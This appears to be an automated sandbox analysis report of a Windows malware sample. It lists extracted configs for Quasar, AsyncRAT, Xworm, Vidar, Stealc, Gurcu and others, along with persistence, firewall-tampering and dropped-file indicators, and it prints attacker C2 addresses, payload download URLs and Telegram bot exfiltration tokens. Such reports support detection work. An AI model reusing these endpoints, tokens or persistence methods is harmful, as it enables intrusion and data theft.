asyncrat | 12fce52d084a8c7efa638c88fa2307bca7c038a49fe566ebb05533cacf17efbd

max time kernel
283s
max time network
508s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
20-01-2025 18:27

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

764KB
MD5

85e3d4ac5a6ef32fb93764c090ef32b7
SHA1

adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52
SHA256

4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1
SHA512

a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab
SSDEEP

12288:6MSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Ufbj:6nsJ39LyjbJkQFMhmC+6GD9mH

Malware Config

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

quasar

Version

1.4.0.0

Botnet

FakeCreal

espinyskibidi-40205.portmap.host:40205

Mutex

CdrjrrWbtRopP1ic7E

Attributes

encryption_key
HXEHSwyN1GHqlZUqunrd
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Client
subdirectory
Microsoft

Extracted

Family

risepro

118.194.235.187:50500

Extracted

Family

metasploit

Version

windows/reverse_tcp

167.250.49.155:445

Extracted

Family

quasar

Version

1.4.1

Botnet

Manager

serveo.net:11453

Mutex

a851cc5b-e50f-4270-9929-06c6323cdb3d

Attributes

encryption_key
5A3C537E5FB2739D5B2468FC37915D58EF4AC5EA
install_name
Runtime broker.exe
log_directory
Microsoftsessential
reconnect_delay
3000
startup_key
Runtime broker
subdirectory
Microsoft_Essentials

Extracted

Family

quasar

Version

1.4.1

Botnet

SGVP

192.168.1.9:4782

150.129.206.176:4782

Ai-Sgvp-33452.portmap.host:33452

Mutex

a35ec7b7-5a95-4207-8f25-7af0a7847fa5

Attributes

encryption_key
09BBDA8FF0524296F02F8F81158F33C0AA74D487
install_name
User Application Data.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windowns Client Startup
subdirectory
Quasar

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Office

45.136.51.217:2222

Mutex

d1mBeqcqGummV1rEKw

Attributes

encryption_key
h9j7M9986eVjQwMbjacZ
install_name
csrss.exe
log_directory
Logs
reconnect_delay
3000
startup_key
NET framework
subdirectory
SubDir

Extracted

Family

xworm

Version

5.0

147.124.216.7:7000

:7000

robert2day-54368.portmap.host:54368

147.182.141.239:7000

Mutex

Chb72kPsRE765ttP

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot6637136966:AAEts3hYw0FMwzt3_IyeXzVgX3ImP0vNUKQ/sendMessage?chat_id=995234876

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

192.168.43.241:4782

Mutex

0517af80-95f0-4a6d-a904-5b7ee8faa157

Attributes

encryption_key
6095BF6D5D58D02597F98370DFD1CCEB782F1EDD
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svhost
subdirectory
SubDir

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

127.0.0.1:8080

127.0.0.1:17027

2.tcp.ngrok.io:6606

2.tcp.ngrok.io:7707

2.tcp.ngrok.io:8808

2.tcp.ngrok.io:8080

2.tcp.ngrok.io:17027

Mutex

KSKA6RWWOYIu

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

stealc

Botnet

Voov2

http://154.216.17.90

Attributes

url_path
/a48146f6763ef3af.php

Extracted

Family

vidar

Version

11.8

Botnet

0174ec9d0ab5d3dd4d0bbe7415cfa10c

https://t.me/fu4chmo

https://steamcommunity.com/profiles/76561199802540894

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

192.168.31.99:4782

2001:4bc9:1f98:a4e::676:4782

255.255.255.0:4782

fe80::cabf:4cff:fe84:9572%17:4782

Mutex

1f65a787-81b8-4955-95e4-b7751e10cd50

Attributes

encryption_key
A0B82A50BBC49EC084E3E53A9E34DF58BD7050B9
install_name
Java Updater.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Java Updater
subdirectory
SubDir

Extracted

Family

vidar

Botnet

p1up1

https://t.me/m3wm0w

https://steamcommunity.com/profiles/76561199804377619

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Extracted

Family

gurcu

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_Ovo/sendMessage?chat_id=5479981438

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_Ovo/getUpdates?offset=

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_Ovo/getUpdates?offset=1

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_Ovo/getUpdates?offset=2

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_Ovo/getUpdates?offset=3

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_Ovo/getUpdates?offset=4

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_Ovo/getUpdates?offset=5

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_Ovo/getUpdates?offset=6

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_Ovo/getUpdates?offset=7

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_Ovo/getUpdates?offset=8

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_Ovo/getUpdates?offset=9

https://api.telegram.org/bot6637136966:AAEts3hYw0FMwzt3_IyeXzVgX3ImP0vNUKQ/sendMessage?chat_id=995234876

https://api.telegram.org/bot8029262913:AAFSJbcefH3RuCQr6aHzYrVOAKTweiR_OvoM/sendMessage?chat_id=5479981438

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Detect Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral1/files/0x001e00000002a6fa-15412.dat	family_vidar_v7
behavioral1/memory/1632-15414-0x0000000000CE0000-0x0000000000F39000-memory.dmp	family_vidar_v7
behavioral1/memory/1632-15627-0x0000000000CE0000-0x0000000000F39000-memory.dmp	family_vidar_v7

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/memory/2200-12463-0x000001982BE90000-0x000001982BEA0000-memory.dmp	family_xworm
behavioral1/memory/6828-12511-0x000001A93A0C0000-0x000001A93A0D0000-memory.dmp	family_xworm
behavioral1/memory/4720-12534-0x00000219A9330000-0x00000219A933E000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default\\Downloads\\conhost.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default\\Downloads\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\5Swt0w3tF0.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default\\Downloads\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\5Swt0w3tF0.exe\", \"C:\\Program Files (x86)\\Windows Defender\\es-ES\\l7Npnlscrd.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default\\Downloads\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\5Swt0w3tF0.exe\", \"C:\\Program Files (x86)\\Windows Defender\\es-ES\\l7Npnlscrd.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\5Swt0w3tF0.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\""	5Swt0w3tF0.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2800	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2024	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2760	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3536	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1500	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1376	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2560	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4384	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4716	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4880	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	752	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1040	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3788	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1552	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4120	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4736	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5080	4116	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2672	4116	schtasks.exe	83

Quasar RAT 7 IoCs

Quasar is an open source Remote Access Tool.

trojan spyware quasar

description	flow	ioc	Process
	71	ip-api.com	Process not Found
	141	ip-api.com	Process not Found
	240	ip-api.com	Process not Found
	339	ip-api.com	Process not Found
	416	ip-api.com	Process not Found
Key opened		\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
	2	ip-api.com	Process not Found

Quasar family
quasar

Quasar payload 12 IoCs

resource	yara_rule
behavioral1/files/0x001c00000002aac5-207.dat	family_quasar
behavioral1/memory/3160-241-0x0000000000800000-0x000000000084E000-memory.dmp	family_quasar
behavioral1/files/0x001900000002ac00-517.dat	family_quasar
behavioral1/memory/3804-524-0x0000000000820000-0x0000000000B44000-memory.dmp	family_quasar
behavioral1/files/0x001900000002ac2a-566.dat	family_quasar
behavioral1/memory/4904-573-0x00000000004C0000-0x00000000007E4000-memory.dmp	family_quasar
behavioral1/files/0x00030000000006a3-579.dat	family_quasar
behavioral1/memory/4272-586-0x0000000000ED0000-0x0000000000F1E000-memory.dmp	family_quasar
behavioral1/files/0x001f00000002ac43-12622.dat	family_quasar
behavioral1/memory/6824-12632-0x0000000000160000-0x0000000000484000-memory.dmp	family_quasar
behavioral1/files/0x000a00000002c599-15737.dat	family_quasar
behavioral1/memory/4864-15743-0x0000000000B20000-0x0000000000BA4000-memory.dmp	family_quasar

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Risepro family
risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/2200-15271-0x0000019844CA0000-0x0000019844DC0000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs

description	pid	Process	procid_target
PID 3924 created 3332	3924	python.exe	52
PID 3924 created 3332	3924	python.exe	52
PID 6204 created 3332	6204	python.exe	52
PID 6204 created 3332	6204	python.exe	52
PID 6540 created 3332	6540	python.exe	52
PID 6540 created 3332	6540	python.exe	52
PID 572 created 3332	572	python.exe	52
PID 572 created 3332	572	python.exe	52

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/files/0x000800000002c5d4-16582.dat	family_xmrig
behavioral1/files/0x000800000002c5d4-16582.dat	xmrig

Xmrig family
xmrig
Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000700000002c46d-12748.dat	family_asyncrat

DCRat payload 4 IoCs

rat

resource	yara_rule
behavioral1/files/0x001900000002aad2-297.dat	family_dcrat_v2
behavioral1/memory/3828-316-0x0000000000400000-0x00000000004FB000-memory.dmp	family_dcrat_v2
behavioral1/memory/228-326-0x0000000000AC0000-0x0000000000B8A000-memory.dmp	family_dcrat_v2
behavioral1/memory/576-328-0x0000000000400000-0x00000000004FB000-memory.dmp	family_dcrat_v2

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
336	powershell.exe
4724	powershell.exe
5300	powershell.exe
5900	powershell.exe
2600	powershell.exe
6960	powershell.exe

Disables Task Manager via registry modification
defense_evasion
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 64 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5488	netsh.exe
2920	netsh.exe
2036	netsh.exe
5424	netsh.exe
5880	netsh.exe
440	netsh.exe
2256	netsh.exe
1400	netsh.exe
4516	netsh.exe
6380	netsh.exe
6680	netsh.exe
2300	netsh.exe
5652	netsh.exe
5928	netsh.exe
6188	netsh.exe
5484	netsh.exe
7080	netsh.exe
5300	netsh.exe
6704	netsh.exe
4100	netsh.exe
3432	netsh.exe
3756	netsh.exe
724	netsh.exe
5564	netsh.exe
4072	netsh.exe
6848	netsh.exe
6388	netsh.exe
3908	netsh.exe
5844	netsh.exe
5364	netsh.exe
5052	netsh.exe
5080	netsh.exe
1992	netsh.exe
4980	netsh.exe
5824	netsh.exe
2096	netsh.exe
5308	netsh.exe
2488	netsh.exe
4536	netsh.exe
6764	netsh.exe
2000	netsh.exe
572	netsh.exe
4484	netsh.exe
6004	netsh.exe
5948	netsh.exe
2656	netsh.exe
3488	netsh.exe
860	netsh.exe
5524	netsh.exe
4792	netsh.exe
2692	netsh.exe
5472	netsh.exe
5552	netsh.exe
6908	netsh.exe
1860	netsh.exe
6120	netsh.exe
6880	netsh.exe
3328	netsh.exe
336	netsh.exe
3260	netsh.exe
6984	netsh.exe
5940	netsh.exe
6852	netsh.exe
5284	netsh.exe

Drops startup file 64 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RATAttack.lnk	notepad.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\65449e22560e51e0740c2a10dc6c9c59.exe	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows update.lnk	cscript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c772fa1f7fc98d866443249d79c0b299Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	server.exe

Executes dropped EXE 64 IoCs

pid	Process
5028	._cache_4363463463464363463463463.exe
2092	Synaptics.exe
4336	._cache_Synaptics.exe
3160	Creal.exe
1448	javaw.exe
3828	javaw.exe
828	javaw.exe
4780	javaw.exe
860	javaw.exe
576	javaw.exe
4860	crypted_c360a5b7.exe
232	3YiUWvKbI3.exe
228	5Swt0w3tF0.exe
2488	5R0FyqxTzg.exe
2164	l7Npnlscrd.exe
3764	Client.exe
2108	billi_e58d74e455634dc695ed8a7b8b320325.exe.upx.exe
2380	MajesticExec.exe
2496	SppExtComObj.exe
488	Client.exe
2044	Client.exe
1228	cdb.exe
2000	Client.exe
2412	Client.exe
3804	Client-built.exe
3092	Runtime broker.exe
5060	Client.exe
4904	SGVP%20Client%20Users.exe
4272	jgesfyhjsefa.exe
3476	newest.exe
1144	server.exe
860	Client.exe
1876	svchost.exe
3776	server.exe
988	svchost.exe
5052	server.exe
576	svchost.exe
2016	server.exe
4176	svchost.exe
1836	server.exe
4104	Client.exe
1292	svchost.exe
2284	server.exe
3820	payload.exe
256	svchost.exe
3188	server.exe
4680	svchost.exe
4128	Client.exe
4696	server.exe
4960	svchost.exe
1996	server.exe
3600	svchost.exe
1836	server.exe
5080	svchost.exe
4980	Client.exe
2484	server.exe
1524	svchost.exe
3468	server.exe
1156	svchost.exe
1676	server.exe
1632	svchost.exe
3532	SharpHound.exe
1820	Client.exe
3584	server.exe

Loads dropped DLL 50 IoCs

pid	Process
3924	python.exe
3924	python.exe
3924	python.exe
3924	python.exe
3924	python.exe
3924	python.exe
3924	python.exe
3924	python.exe
6204	python.exe
6204	python.exe
6204	python.exe
6204	python.exe
6204	python.exe
6204	python.exe
6204	python.exe
6204	python.exe
6540	python.exe
6540	python.exe
6540	python.exe
6540	python.exe
6540	python.exe
6540	python.exe
6540	python.exe
6540	python.exe
572	python.exe
572	python.exe
572	python.exe
572	python.exe
572	python.exe
572	python.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
